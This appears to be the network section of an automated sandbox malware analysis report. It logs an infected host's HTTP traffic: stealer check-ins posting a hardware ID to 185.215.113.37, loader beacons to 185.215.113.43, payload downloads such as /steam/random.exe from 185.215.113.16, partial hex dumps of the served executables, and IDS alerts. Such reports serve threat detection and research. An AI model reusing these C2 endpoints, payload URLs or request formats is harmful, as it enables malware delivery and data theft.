61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:50 GMTContent-Type: application/octet-streamContent-Length: 2742272Last-Modified: Thu, 24 Oct 2024 01:44:44 GMTConnection: keep-aliveETag: "6719a68c-29d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 25 5a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 78 69 6a 65 73 76 6f 00 80 29 00 00 a0 00 00 00 78 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6f 61 6d 79 79 68 71 00 20 00 00 00 20 2a 00 00 04 00 00 00 b2 29 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:03:13 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Thu, 24 Oct 2024 01:49:23 GMTConnection: keep-aliveETag: "6719a7a3-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 86 d7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 d2 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 d1 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 
90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 72 6f 70 67 66 73 73 00 e0 19 00 00 00 31 00 00 d4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 75 74 77 74 7a 68 00 10 00 00 00 e0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:03:19 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:03:21 GMTContent-Type: application/octet-streamContent-Length: 2742272Last-Modified: Thu, 24 Oct 2024 01:44:44 GMTConnection: keep-aliveETag: "6719a68c-29d800"Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJECBKKECFIEBGCAKJKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HJJECBKKECFIEBGCAKJKContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------HJJECBKKECFIEBGCAKJKContent-Disposition: form-data; name="build"doma------HJJECBKKECFIEBGCAKJK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 37 32 41 37 34 42 38 35 38 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B72A74B85882D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001090001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001091001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"doma------AAKJKJDGCGDBGDHIJKJE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001092001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAAAFBKFIECAAKECGCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 2d 2d 0d 0a Data Ascii: ------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="build"doma------FCAAAAFBKFIECAAKECGC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 30 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001093001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 2d 2d 0d 0a Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="build"doma------GDAAKKEHDHCAAAKFCBAK--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBFIIECBGCBGDHCAFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 46 49 49 45 43 42 47 43 42 47 44 48 43 41 46 43 2d 2d 0d 0a Data Ascii: ------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------BAEBFIIECBGCBGDHCAFCContent-Disposition: form-data; name="build"doma------BAEBFIIECBGCBGDHCAFC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="build"doma------EHIIIJDAAAAAAKECBFBA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build"doma------GIECFIEGDBKJKFIDHIEC--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"doma------BGCAFHCAKFBFIECAFIIJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 37 42 32 36 39 44 32 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="hwid"B97B269D2A6E2371543510------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="build"doma------JDHIEBFHCAKEHIDGHCBA--
Source: Joe Sandbox View IP Address: 104.21.53.8
Source: Joe Sandbox View IP Address: 185.215.113.43
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49930 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49837 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49990 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49993 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49995 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49995 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:50039 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:50095 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16 (50 identical entries collapsed into one)
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com (4 identical entries collapsed into one)
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16 (3 identical entries collapsed into one)
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16 (3 identical entries collapsed into one)
